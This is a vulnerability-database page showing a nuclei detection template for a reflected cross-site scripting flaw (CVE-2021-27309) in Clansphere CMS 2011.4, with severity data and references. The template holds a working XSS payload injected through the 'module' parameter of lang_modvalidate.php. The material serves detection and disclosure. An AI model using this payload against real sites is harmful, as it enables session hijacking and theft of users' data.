Lucene search

K

Clansphere CMS 2011.4 - Cross-Site Scripting

🗓️ 17 Jun 2022 06:40:01Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 29 Views

Clansphere CMS 2011.4 unauthenticated reflected cross-site scripting vulnerability via the "module" paramete

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
Clansphere Cross-Site Scripting Vulnerability
24 Mar 202100:00
cnvd
NVD
CVE-2021-27309
23 Mar 202114:15
nvd
Cvelist
CVE-2021-27309
23 Mar 202113:28
cvelist
Prion
Design/Logic Flaw
23 Mar 202114:15
prion
CVE
CVE-2021-27309
23 Mar 202114:15
cve
id: CVE-2021-27309

info:
  name: Clansphere CMS 2011.4 - Cross-Site Scripting
  author: edoardottt
  severity: medium
  description: |
    Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the  "module" parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of Clansphere CMS or apply the vendor-supplied patch to fix the XSS vulnerability.
  reference:
    - https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22module%22%20xss.md
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27309
    - https://nvd.nist.gov/vuln/detail/CVE-2021-27309
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-27309
    cwe-id: CWE-79
    epss-score: 0.00106
    epss-percentile: 0.43249
    cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: csphere
    product: clansphere
  tags: cve2021,cve,clansphere,xss,cms,unauth,csphere

http:
  - method: GET
    path:
      - "{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language&module=module%22></script><script>alert(document.domain)</script>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"></script><script>alert(document.domain)</script>.php'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008af07f82ab34748f3f29221594cba2f52471c565d0af735a0d701062a559ef4b022021340178054dc3ef98e28e27522dd6b852890666e8a85fcf860027eebe1d17ef:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
17 Jun 2022 06:01Current
6.2Medium risk
Vulners AI Score6.2
CVSS24.3
CVSS36.1
EPSS0.00129
29
.json
Report